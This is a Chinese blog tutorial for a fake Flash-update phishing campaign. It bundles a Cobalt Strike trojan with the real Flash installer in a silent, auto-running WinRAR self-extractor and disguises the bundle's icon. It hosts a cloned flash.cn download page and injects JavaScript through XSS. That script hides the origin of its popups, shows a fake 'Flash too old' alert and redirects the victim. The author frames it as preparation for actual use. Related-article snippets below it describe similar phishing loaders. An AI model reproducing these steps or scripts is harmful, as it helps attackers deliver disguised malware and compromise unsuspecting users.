Flash水坑钓鱼

最新推荐文章于 2023-11-24 11:39:39 发布
最新推荐文章于 2023-11-24 11:39:39 发布
阅读量5.7k 收藏 26
点赞数 6
分类专栏: WEB 漏洞复现和分析
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/god_zzZ/article/details/104192518
版权

Flash水坑钓鱼

起因

在网络上看到许多大佬都拿这个钓鱼,而且感觉成功率贼高。
未雨绸缪,先测试一下,以后肯定用的到

准备

flash官网的钓鱼源码:https://github.com/r00tSe7en/Fake-flash.cn
一个服务器
一个域名
一个马子

先配置一个马子吧

  • 使用常用的CS吧,随便来一个,成功上线
    在这里插入图片描述
  • 关于免杀,暂时就不了(因为菜)
  • 推荐使用一个好的隐藏方式

自解压捆绑文件的利用

捆版木马时碰到一个问题大多捆绑软件本身就会被杀软查杀,所以选择利用winrar实现捆绑。

  1. 准备好的木马和flash安装程序

  2. 鼠标右键,添加到压缩文件。

点击创建自解压格式压缩文件
在这里插入图片描述
4. 点击高级自解压选项-------------------常规
在这里插入图片描述

使用绝对路径 -------------- C:\windows\temp

在这里插入图片描述

  1. 设置---------提取后运行
C:\windows\temp\flash.exe

C:\windows\temp\flashplayer_install_cn.exe

在这里插入图片描述

  1. 安静模式---------全部隐藏

在这里插入图片描述

  1. 更新
更新方式----解压并更新文件

覆盖方式----覆盖所有文件

在这里插入图片描述

  1. 确定,出去把文件名改的像一点
    在这里插入图片描述
  2. 这图标也不像啊,得改
    在这里插入图片描述
  3. 使用 ResourceHacker 把图标改了,自行下载
  4. 通过ResourceHacker打开原版的flash安装程序,点击Icon Group文件夹中的文件,鼠标右键保存“*.ico资源”,即可导出ico图标。
    在这里插入图片描述
  5. 同样的方法----ResourceHacker打开刚刚打包好的文件,点击Icon Group文件夹中的文件,鼠标右键替换ico图标,最后保存

在这里插入图片描述
在这里插入图片描述
最后保存成功,图标搞定图标搞定

  • 捆绑木马就做好了。下面是运行截图,伪装的完美,全程无感知,就是没有做木马的免杀如果有杀毒软件会报毒。
  • 在这里插入图片描述
  • 也能上线在这里插入图片描述
  • 马子完成了。

上传到服务器

跟前情况自己开服务,我就直接装了了一个Apache
在这里插入图片描述
修改fake网站的源码,把链接加进去。

在这里插入图片描述
上传到服务器看效果

在这里插入图片描述
还可以,就是域名方面需要进一步的伪造,要买一个不错的域名更佳

常见用法

直接给地址让下载这个可能性太低了,感觉还是需要XSS打进去,弹框提示上钩的几率最大,这也大家常用的方法之一。
但是有个问题不能让看出是弹窗,最后是可以隐藏掉网站显示

//重写alert方法,去掉地址显示
window.alert = function(name){
var iframe = document.createElement("IFRAME");
iframe.style.display="none";
iframe.setAttribute("src", 'data:text/plain,');
document.documentElement.appendChild(iframe);
window.frames[0].window.alert(name);
iframe.parentNode.removeChild(iframe);
}

//重写confirm方法,去掉地址显示
window.confirm = function(name){
var iframe = document.createElement("IFRAME");
iframe.style.display="none";
iframe.setAttribute("src", 'data:text/plain,');
document.documentElement.appendChild(iframe);
var result = window.frames[0].window.confirm(name);
iframe.parentNode.removeChild(iframe);
return result;
}

在这里插入图片描述

window.alert = function(name){var iframe = document.createElement("IFRAME");iframe.style.display="none";iframe.setAttribute("src", 'data:text/plain,');document.documentElement.appendChild(iframe);window.frames[0].window.alert(name);iframe.parentNode.removeChild(iframe);};alert("您的FLASH版本过低,请尝试升级后访问改页面!");window.location.href="https://www.baidu.com";

可以直接在XSS平台里面建一个模块,然后xss打出去,要不太长了代码

god_Zeo
关注
  • 6
    点赞
  • 26
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
刺刺:水坑攻击网络钓鱼攻击自动部署
03-04
是一个自动化部署水坑和网页钓鱼的项目。 想要了解更多可以阅读: 用法 使用本项目需要拥有一个域名,将A记录指向到当前服务器,否则只能通过IP访问。 $ git clone https://github.com/Rvn0xsy/Pricking $ cd ...
2023年flash水坑攻击源码
crowsec
01-30 2889
2023年,flash最新钓鱼界面
Xss——Flash钓鱼
weixin_56291508的博客
04-22 691
Xss——Flash钓鱼
Flash钓鱼->CS上线(免杀过火绒、360等)
weixin_54227009的博客
05-13 9775
这个马儿是rar压缩的,做成的rar解压自启动,所以是个exe的文件,然后这里为了像一点,把图标给改了。这里砸门为了逼真一点,所以把这个压缩包的图标改成Flash的图标。3、将免杀的exe跟生成的PayloadFile进行压缩。5、将这个exe的压缩包的路径放在砸门服务器上的flash.js上即可。执行路径为:C:\Windows\Temp\Flash.exe。3.4、高级->模式->静默模式->全部隐藏。这里我把解压路径给改成了:C:\Windows\Temp。3.2、 高级->常规->解压路径。
笑里藏刀——也谈文件捆绑技术
张宏双的专栏
12-15 1169
导读:   笑里藏刀   ——也谈文件捆绑技术   作者:[HBU]小金   一、眼睛,我凭什么相信你?   某天,QQ上有朋友给小白发了个编译成EXE文件的精彩FlashFlash的确很好看,把小白逗得哈哈大笑。可是才过一会儿,他就笑不出来了:光驱不停弹出、鼠标乱跑、文件被删除……在他手足无措的时候,电脑突然重启,系统彻底瘫痪。   这是出现在许多描写黑客入侵的文章不约而同采用的“经典
红队之社工钓鱼winrar自解压捆绑
大雾
10-14 269
上线成功。
网络攻防|XSS Flash弹窗钓鱼
weixin_42282189的博客
11-15 2726
作者: Overture 免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责。 0x00 前言 xss弹出flash更新是一种常见的钓鱼手法,本文介绍一下整体思路和部分技术细节。 注意:任何未经授权的渗透都是违法行为,本文仅用于技术讨论,切勿用于违法途径 前期准备 服务器及域名 flash页面 免杀木马 前提条件:目标网站存在存储型xss漏洞或者已经getshell能够修改源码,通过请求你插入的js代码触发flash升级弹窗,跳转到准备好的flash下载界面下载安装,触发木马上线cs.
水坑施工方案.pdf
10-23
水坑施工方案.pdf
水坑攻击网络钓鱼攻击自动部署。-JavaScript开发
05-26
Pricking 是一个自动化部署水坑和网页钓鱼的项目。 想要了解更多可以阅读: 红队技巧:基于反向代理的水坑攻击 Pricking 项目(一) :使用介绍 Pricking 项目(二) :JS模块开发 Usage 使用本项目需要拥有一...
waterdiviner:识别文本中的水坑
06-09
水坑攻击是攻击者识别其目标受害者使用的公共资源,并专注于利用该资源以获得可信向量的地方。 该工具从文本文档中提取潜在的水坑,排除前 1000 个最常见的域,以便工程师专注于更容易被利用的域。 目前,这就是它...
Bat转换为Exe软件,EXE融合器,innosetup(单文件打包有安装界面),RAR自解压避免右键解压打包捆绑Fusion工具,加壳工具
06-17
这里还有我写的操作文档 exe打包.docx Bat转换为Exe软件,EXE融合器,innosetup(单文件打包有安装界面),RAR自解压避免右键解压打包捆绑Fusion工具,加壳工具
flash动画小猫钓鱼
03-31
一个动画一个动画一个动画一个动画一个动画
FlashRepairToolInstaller.exe
04-02
FlashRepairToolInstaller.exe flash修复
Fake-flash.cn:flash.cn钓鱼页(中文+英文)
02-03
Fake-flash.cn:flash.cn钓鱼页(中文+英文)
基于 Deeplabv3 多尺度训练、多类别分割:路面水坑分割【数据集+代码+训练结果】
最新发布
05-09
数据集路面水坑分割,可直接运行 1.train 脚本会自动训练,代码会自动将数据随机缩放为设定尺寸的0.5-1.5倍之间,实现多尺度训练。为了实现多分割项目,utils中的compute_gray函数会将mask灰度值保存在txt文本,...
Flash钓鱼
热门推荐
weixin_45794666的博客
02-22 2万+
Flash钓鱼 首先将写好的flash.js放在自己的服务器上 var s1 = document.createElement('script'); s1.setAttribute('type','text/javascript'); s1.setAttribute('src','//cdn.bootcdn.net/ajax/libs/jquery/2.0.0/jquery.min.js'); var head = document.getElementsByTagName('head')[0]; head
红队钓鱼技术之Flash网页钓鱼
xf555er的博客
08-07 425
Flash钓鱼攻击是一种网络攻击手段,旨在欺骗用户访问伪造的Flash更新页面,并诱使他们下载并安装恶意软件。这种攻击通常利用用户对Flash更新的需求,以及对合法更新网站的信任。攻击者通常会模仿Adobe Flash Player的官方更新页面,以提高诱骗成功率。
Flash软件捆绑远控木马进行钓鱼 + 写入注册表进行权限维持
m0_64382069的博客
11-24 237
Flash软件捆绑远控木马进行钓鱼,在获取windows主机权限后,写入注册表后门进行权限维持,并检验注册表后门的效果。
Flash钓鱼讲解
good good study
05-31 985
flash钓鱼
yolov5识别水坑
11-25
要让yolov5识别水坑,首先需要准备大量的包含水坑的图像数据,包括不同角度、不同光照条件下的水坑图片。然后利用这些图像数据进行训练,让yolov5学习如何识别水坑。在训练的过程中,需要不断调整算法的参数,使之...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值